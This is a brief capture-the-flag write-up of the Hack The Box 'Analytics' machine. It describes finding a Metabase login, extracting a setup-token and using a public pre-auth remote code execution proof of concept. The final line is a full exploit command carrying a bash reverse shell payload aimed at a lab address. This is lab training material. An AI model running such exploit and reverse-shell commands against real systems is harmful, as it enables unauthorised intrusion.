💢Analytics

https://app.hackthebox.com/machines/Analytics

After some quick enumeration, we discover a web server → after a quick look around, we arrive at a login page:

a quick search reveals a RCE Pre auth with metabase: https://github.com/m3m0o/metabase-pre-auth-rce-poc

Let's look at the usage:

So we capture the request and change the get value in order to find the setup-token:

setup-token":"249fa03d-fd94-4d5b-b94f-b4ebf3df681f"

I tried triggering a whomai, but it is not intended to be used like that, more in an optic to do a reverse shell:

So I copy my ip address and then set up a listener:

python3 main.py -u http://analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/10.10.14.61/9898 0>&1"

Last updated